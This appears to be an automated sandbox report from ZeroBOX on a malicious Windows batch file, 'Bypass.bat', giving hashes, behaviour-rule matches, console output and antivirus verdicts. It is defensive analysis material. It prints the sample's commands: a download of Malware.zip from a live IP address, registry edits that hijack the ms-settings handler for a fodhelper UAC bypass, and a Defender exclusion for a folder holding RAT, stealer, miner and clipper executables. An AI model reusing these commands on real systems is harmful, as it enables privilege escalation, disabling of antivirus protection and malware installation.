Summary | ZeroBOX

Bypass.bat

Generic Malware UPX Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential P2P AntiDebug PE File ZIP Format AntiVM PE32
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 23, 2023, 9:34 a.m. Sept. 23, 2023, 9:37 a.m.
Size 1019.0B
Type DOS batch file, ASCII text, with CRLF line terminators
MD5 08c880b1f0b63680b7bdd78408bdceda
SHA256 90eb14090777aa5ec4e72b3850a25fc4d08e64273c85586494b9838df8d493d9
CRC32 9E4F7AB9
ssdeep 24:OlWrpSFURAuUOZzalHkS76AcZzTW/nZzTWYZzTWHnZzTI8nZzTZ8nZzT08nZzTuW:ODQAza2lBDEfW/ZfWIfW5fImfZmf0mfJ
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
45.66.230.113 Active Moloch

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'fodhelper.exe' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'tar' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the file specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the file C:\Users\test22\AppData\Local\ServiceHub\Rat.exe.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the file C:\Users\test22\AppData\Local\ServiceHub\Stealer.exe.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the file C:\Users\test22\AppData\Local\ServiceHub\Miner.exe.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the file C:\Users\test22\AppData\Local\ServiceHub\Clipper.exe.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Waiting for 3
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: seconds, press a key to continue ...
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Waiting for 60
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: seconds, press a key to continue ...
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://45.66.230.113/Malware.zip
request GET http://45.66.230.113/Malware.zip
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo yes "
file C:\Users\test22\AppData\Local\Temp\X.exe
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communications over P2P network rule Network_P2P_Win
description Communication using DGA rule Network_DGA
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Escalate priviledges rule Escalate_priviledges
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Take ScreenShot rule ScreenShot
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
cmdline C:\Users\test22\AppData\Local\ServiceHub\Rat.exe
cmdline reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
cmdline reg delete "HKCU\Software\Classes\.thm\Shell\Open\command" /f
cmdline reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /v "" /d "C:\Users\test22\AppData\Local\Temp\X.exe -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\ServiceHub'}" /f
cmdline reg delete "HKCU\Software\Classes\ms-settings\CurVer" /f
host 45.66.230.113
ESET-NOD32 BAT/TrojanDownloader.Agent.PDG
Kaspersky HEUR:Trojan.BAT.Agent.gen
BitDefender Trojan.GenericKD.69403469
MicroWorld-eScan Trojan.GenericKD.69403469
Emsisoft Trojan.GenericKD.69403469 (B)
VIPRE Trojan.GenericKD.69403469
McAfee-GW-Edition BehavesLike.Backdoor.xq
FireEye Trojan.GenericKD.69403469
GData Trojan.GenericKD.69403469
MAX malware (ai score=83)
Arcabit Trojan.Generic.D423034D
ZoneAlarm HEUR:Trojan.BAT.Agent.gen